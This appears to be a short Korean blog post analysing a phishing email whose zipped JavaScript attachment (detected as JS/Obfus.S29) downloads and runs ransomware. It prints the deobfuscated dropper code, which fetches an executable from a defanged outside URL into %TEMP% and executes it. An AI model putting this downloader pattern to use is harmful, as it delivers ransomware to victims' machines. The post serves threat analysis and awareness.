한국 메일로 유포되는 악성메일 분석 (JS/Obfus.S29)

얼마전부터 제 메일로 이상한 메일이 오고 있습니다.

메일 송신자는 제 메일이고

제목은 Scan4 / hi prnt 등의 제목이었습니다.

그리고 이상한 zip파일이 첨부되어 있었습니다.

그 중 하나의 첨부파일 이름은

SCAN004862814.zip

압축을풀면 SCAN004862814.js 파일이 생성됩니다.

해당 자바스크립트 파일을 실행하면 악성코드가 다운받아져서 실행됩니다.

// 원본파일이름 : SCAN004862814.js

// 원본파일md5  : 6576cd7c4ba8cb77ce3b23899139c27f

// 진단명(Ahnlab) : JS/Obfus.S29

소스가 난독화 되어 있어 복잡하지만 분석하면 간단해집니다.

// 실제 동작 소스 if(0){ var ohttp = new ActiveXObject("MSXML2.XMLHTTP"); var ostream = new ActiveXObject("ADODB.Stream"); var oshell = new ActiveXObject("WScript.Shell"); var path = "%TEMP%\\jyJxExodzq.exe"; ohttp.open("GET", "hxxp://grafit.com.tr/8778h4g", false); ostream.open(); ostream.type = 1; ostream.write(ohttp.ResponseBody); ostream.position = 0; ostream.saveToFile(path, 2); oshell.Run(path, 1, false); }

해당 URL으로는 지금 접속되진 않네요.

해당 악성코드는 랜섬웨어라고 합니다.